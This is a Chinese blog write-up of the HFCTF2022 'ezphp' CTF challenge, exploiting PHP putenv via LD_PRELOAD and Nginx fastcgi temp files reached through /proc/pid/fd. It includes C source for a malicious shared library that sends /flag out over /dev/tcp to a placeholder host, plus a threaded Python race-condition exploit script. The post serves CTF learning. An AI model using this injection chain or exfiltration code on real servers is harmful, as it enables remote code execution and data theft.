[HFCTF2022]ezphp

最新推荐文章于 2024-03-04 07:00:00 发布
最新推荐文章于 2024-03-04 07:00:00 发布
阅读量2.5k 收藏 3
点赞数 1
分类专栏: Fastcgi BUUCTF 文章标签: 1024程序员节 网络安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/snowlyzz/article/details/127495361
版权

前言:

好久没更过博客,因为一直在补JAVA.  有空了就复现下今年的HF。

考点:

Nginx-Fastcgi  缓存文件

脚本编写遍历pid,fd

解题:

<?php (empty($_GET["env"])) ? highlight_file(__FILE__) : putenv($_GET["env"]) && system('echo hfctf2022');?>

这题  有个putenv  猜测大概流程就是加载恶意的 so 进行反弹shell 

此题的考点是 NGINX 在后端 fastcgi 相应过大 或者 请求正文 body 过大时,会产生临时文件。

如果一个进程打开了某个文件,某个文件就会出现在 /proc/pid/fd/目录下,我们的思路就是通过重复发过大的恶意so文件造成缓存,然后他会存在这个目录下,再使用LD_PRELOAD去加载链接库。

LD_PRELOAD加载so:

这个问题太经典 就不说了

#include <stdlib.h>
#include <string.h>
__attribute__ ((constructor)) void call ()
{
	unsetenv("LD_PRELOAD");
	char str[65536];
	system("bash -c 'cat /flag' > /dev/tcp/pvs/port");
	system("cat /flag > /var/www/html/flag");
}

gcc -shared -fPIC /test/hack.c -o hack.so -ldl
export LD_PRELOAD=/test/hack.so

exp:

import threading , requests,time

url = f"http://590fbd75-ed0a-4034-b216-087a5dba05bb.node4.buuoj.cn:81/"
flag = ""
nginx_workers= [12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27]


def upload():    #上传 so 文件 且 Fastcgi 返回响应包过大,导致 Nginx 需要产生临时文件进行缓存
    print("[+] starting upload")
    while True:
        requests.get(url,data=open("exp.so","rb").read() + (16*1024* "A").encode())
        print(flag)

for q in range(16):
    t = threading.Thread(target=upload).start()
    time.sleep(0.5)


def bruter(pid):    #遍历 pid 下的 fd ,修改LD_PRELOAD
    while True:
        time.sleep(10)
        print(f"[+ ] brust restart {pid}")
        for fd in (4,32):
            f = f'/proc/{pid}/fd/{fd}'
            print(f)
            try:
                r = requests.get(url,params={'env':'LD_PRELOAD=' + f,})    #加载 恶意的exp.so
                print(r.text)
            except Exception:
                pass

for pid in  nginx_workers:
    a = threading.Thread(target=bruter, args=(pid, )).start()

打不通 因为一直爆429  没办法 ,只好放弃。

关于Nginx临时文件在/proc下

当Nginx的fastcgui接收到的响应大小超过32Kb就会在/var/lib/nginx/fastcgi产生一个存放相应内容的临时文件, 但其实这个过程可以说是稍纵即逝,文件创建到删除的窗口期根本不足以让我们及时的就行文件加载, 这时候就用到了记录进程信息的文件夹/proc/pid/fd。 在Linux上,在一个进程中打开的文件描述符集可以在/proc/PID/fd/路径下访问,其中PID是进程标识符。

​ 在这里面存放有进程打开的全部资源文件的软链接, 最重要的是即使临时文件被删除了也还是一样可以被正常读取(条件竞争)

所以我们就可以将临时文件上传控制为我们的恶意so文件, 然后设置payload为

?env=LD_PRELOAD=/proc/pid/fd/file_id

利用条件竞争去加载so,之后的echo命令 就会加载我们的恶意so文件

此题总结:

  1. 让后端 php 请求一个过大的文件
  2. Fastcgi 返回响应包过大,导致 Nginx 需要产生临时文件进行缓存
  3. 虽然 Nginx 删除了/var/lib/nginx/fastcgi下的临时文件,但是在 /proc/pid/fd/ 下我们可以找到被删除的文件
  4. 遍历 pid 以及 fd ,修改LD_PRELOAD完成 LFI

如何找PID?

那么有个问题,那我们是不是得遍历 PID 再遍历FD? 是的,只能利用脚本建立多一些的线程,(看个人电脑的上限), 让包含文件的进程阶梯式的扫描完每组的pid(例如20个线程则每组pid数为20,先扫了1-20然后扫21-40一次递增)。因为一般在fd中的文件号不会超过70, 每组我们需要跑1400(20*70)次, 这个对于计算机并没有太大压力, 。

此外, 对于题目环境的docker来说, 打开的服务并不会很多, 所以pid也不会很大, 一般情况下例如我建立的docker中处理请求的Nginx Workerpid一直是二百多, 所以即使是从0开始逐渐遍历那也只需要跑300*70*20次, 这段时间的等待对我们来说还是可以接受的。

​ 如果想要直接进入自己的docker找到处理请求的Nginx Worker, 就需要找到/proc/pid/cmdline文件内容为 nginx: worker process的进程, 一个Nginx服务默认只有一个Nginx Worker所以也就不难找了

fastcgi外的临时文件

实际上除了 /var/lib/nginx/fastcgi  会新建临时文件缓存数据外,在/var/lib/nginx/body 下也建立存放 请求数据的临时文件,文件的格式为 : /client_body_temp/xxxxxxxxxx  (前面的为0 ,后面的数字例如 0000000001.

但是这个临时文件保存是否会执行也是有一定的限制的, 这个限制就是上文要保留临时文件的第一种情况:    client_body_in_file_only  配置开启, 这个配置的说明为 Determines whether nginx should save the entire client request body into a file(决定nginx是否应该将整个客户端请求正文保存到一个文件中), 但很可惜在默认下它是Off。

rethink:

受益匪浅。

参考:

HFCTF2022 Web ezphp_Sk1y的博客-CSDN博客

我是如何利用环境变量注入执行任意命令 - 跳跳糖 (tttang.com)

2022 虎符CTF Writeup by 唯独你没懂

HFCTF 2022-EZPHP - h0cksr - 博客园 (cnblogs.com)

snowlyzz
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HFCTF2022 Web ezphp
Sk1y的博客
03-28 5568
HFCTF2022 文章目录HFCTF2022ezphp ezphp 这个题目本来以为考点是p佬的文章,但是不是这样的。 p佬文章:我是如何利用环境变量注入执行任意命令
2022虎符线上团队赛 有关web的部分题解(持续更新)
weixin_51458899的博客
03-23 4081
ezphp 可以参考jacko大神的虎符CTF (wolai.com) 题目是与p神之前的博客相似: 我是如何利用环境变量注入执行任意命令 | 离别歌 (leavesongs.com) 可惜题目相同环境不同,刚好此题是上面博客未解答的部分 最终通过查阅资料发现: hxp CTF 2021 - A New Novel LFI - 跳跳糖 (tttang.com) 简单而言就是 fastcgi在处理过大的临时文件时,删除文件没有关闭句柄导致/proc/PID/fd/泄露,于是制造了文件上传的点 关于动态链接库的
[BJDCTF2020]EzPHP1 --不会编程的崽
最新发布
不会编程的崽的博客
03-04 1253
ctf create_function $_server&$request的绕过
HF2022-EzPHP复现
as you know, nlp is fantasitc!
07-27 308
由于程序是运行时动态加载链接的库,如果让程序加载一个恶意的文件,那么就可以劫持程序的运行,从而可以绕过disable_function,执行命令。LD_PRELOAD,是个环境变量,用于动态库的加载,动态库加载的优先级最高,一般情况下,其加载顺序为。构造更大的二进制文件,通过在一个so文件尾部追加脏字符。...
BUUCTF-[BJDCTF2020]EzPHP
m0_52016680的博客
05-07 441
一道挺不错的绕正则表达式的题。 打开环境 点一点发现啥也没有,日常看源码。Ctrl+U发现了一个加密,本以为是base64,但是解码失败,试了试base32成功了 这里推荐一个网站CTF在线工具-CTF工具|CTF编码|CTF密码学|CTF加解密|程序员工具|在线编解码 各种编码方式加密方式挺全的,值得收藏。 访问之后发现是代码审计 <?php highlight_file(__FILE__); error_reporting(0); $file = "1nD3x.php"; ..
HFCTF2022RE部分WP
weixin_50783572的博客
03-28 899
fpbe 这题通过题目了解到了这是一个用了BPF的程序 通过查看https://github.com/libbpf/libbpf/blob/master/src/libbpf.h 可以知道对程序进行了hook /** * @brief **bpf_program__attach_uprobe()** attaches a BPF program * to the userspace function which is found by binary path and * offset. You can
2022-HFCTF-江苏翔信二队-Writeup1
08-03
2022-HFCTF-江苏翔信二队-Writeup1
[虎符CTF] ezphp:LD_PRELOAD环境变量注入
Landasika的博客
05-17 941
目录 思路遇到的问题什么是.so文件什么是LD_PRELOAD构造.so文件找到Nginx的缓存文件的目录遇到的问题找到缓存目录上传.so 思路 参考链接: http://y24.top/posts/%E6%96%87%E7%AB%A0/2022%E8%99%8E%E7%AC%A6ctf/ https://tttang.com/archive/1384/ https://www.anq...
HECTF2020题解之ezphp
Mrs_H的博客
01-04 673
HECTF2020题解之ezphp 一 题目的来源 这道题的前身来源于NCTF2019的一道题名为“easyphp”,在HECTF中并没有完全复刻上述的题目,只是对其中的两个考点进行了参考,这篇文章也将对这其中的两个考点进行讲述。本文在在行文过程中同样参考了NCTF2019的官方wp,链接会放在文章最后。 二 题目描述 <?php error_reporting(0); highlight_file(__file__); include('flag.php'); $string_1 = $_GET
BUUCTF [BJDCTF2020]EzPHP1详解
Aiwin的博客
05-14 1265
BUUCTF [BJDCTF2020]EzPHP1包含的知识与详解
ezphp:设置PHP开发环境的简便方法
05-26
EzPHP为您提供了一个用于开发的个人PHP Web服务器。 该项目的目标是提供一个.exe文件,使您可以随时使用PHP开发环境。 EzPHP将安装从下载PHP v.7.4.14 安装 下载 。 为您的项目创建一个新文件夹,然后复制ezphp.exe。 运行ezphp.exe。 如果未在本地安装PHP,则ezphp将尝试下载并安装PHP。 在打开浏览器。 高级用户执行ezphp.exe -h以查看所有选项。 Usage of ./ezphp: -S string <addr>:<port> - Run with built-in web server. (default "localhost:8080") -t string <docroot> - Specify document root <docroot> for built-i
2022HFCTF-线上赛官方Writeup1
08-04
随后读取了未知的 RSA 公钥 /etc/firmware.pub ,对第 8 字节开始的 128 字节进了公钥解密再然后 16 字节明 MD5。始有 zlib
CTF 湖湘杯 决赛 2021 final.zip
12-07
CTF 湖湘杯 决赛 2021 final
[BJDCTF2020]EzPHP超级详解
qq_72685284的博客
06-28 579
首先f12,base32解码一下,发现目录,这些都很简单关键是下面的,我在这里不是给大家讲如何拿到flag,我的重点是思路,和加深对这道题目的理解,所以可能有些啰嗦。咱们接下来一点点分析。
[GWHT]ezphp(反序列化)
Makabakahaha的博客
09-09 319
php反序列化基础
[BJDCTF2020]EzPHP
m0_62905261的博客
07-15 2800
[BJDCTF2020]EzPHP
ctfshow 常用姿势 801-827
blowed的博客
06-04 1731
主要是脚本 做法 基本上没原理
[BJDCTF2020]EzPHP 许多的特性
m0_64180167的博客
12-07 597
这道题可以学到很多东西 静下心来慢慢通过本地知道是干嘛用的就可以学会了这里开始一部分一部分看。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8227
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值